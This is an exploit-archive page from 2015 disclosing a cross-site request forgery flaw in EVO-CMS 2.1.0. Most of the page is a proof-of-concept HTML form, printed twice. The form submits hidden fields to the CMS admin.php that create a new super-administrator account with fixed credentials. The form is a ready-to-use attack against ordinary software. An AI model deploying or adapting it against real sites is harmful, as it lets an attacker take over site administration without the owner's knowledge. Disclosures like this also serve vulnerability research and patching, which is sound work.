Home / exploitsPDF  

EVO-CMS 2.1.0 Cross Site Request Forgery

Posted on 25 February 2015

# Affected software: evo cms
# Type of vulnerability: adding new admin (csrf)
# URL: http://www.evo-german.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
#version:EVO-CMS 2.1.0
# Proof of concept

attacker was able to add new admin as there were no protection against csrf

poc

<html>

 <body>
 <form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">
 <input type="hidden" name="authors[add_name]" value="test" />
 <input type="hidden" name="authors[add_aid]"
value="test123" />
 <input type="hidden" name="authors[add_email]"
value="test@gmail.com" />
 <input type="hidden" name="authors[add_url]"
value="http://demo.opensourcecms.com/evocms/" />
 <input type="hidden" name="authors[add_admlanguage]"
value="english" />
 <input type="hidden" name="authors[add_radminsuper]"
value="1" />
 <input type="hidden" name="authors[add_pwd]"
value="test123" />
 <input type="hidden" name="authors[add_pwd2]"
value="test123" />
 <input type="hidden" name="op" value="addadmin" />
 <input type="hidden" name="module" value="authors" />
 <input type="hidden" name="submit" value="Create Administrator" />
 <input type="submit" value="Submit request" />
 </form>
 </body>
</html>

poc:

<html>

 <body>
 <form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">
 <input type="hidden" name="authors[add_name]" value="test" />
 <input type="hidden" name="authors[add_aid]"
value="test123" />
 <input type="hidden" name="authors[add_email]"
value="test@gmail.com" />
 <input type="hidden" name="authors[add_url]"
value="http://demo.opensourcecms.com/evocms/" />
 <input type="hidden" name="authors[add_admlanguage]"
value="english" />
 <input type="hidden" name="authors[add_radminsuper]"
value="1" />
 <input type="hidden" name="authors[add_pwd]"
value="test123" />
 <input type="hidden" name="authors[add_pwd2]"
value="test123" />
 <input type="hidden" name="op" value="addadmin" />
 <input type="hidden" name="module" value="authors" />
 <input type="hidden" name="submit" value="Create Administrator" />
 <input type="submit" value="Submit request" />
 </form>
 </body>
</html>

 

TOP

Malware :

Exploits :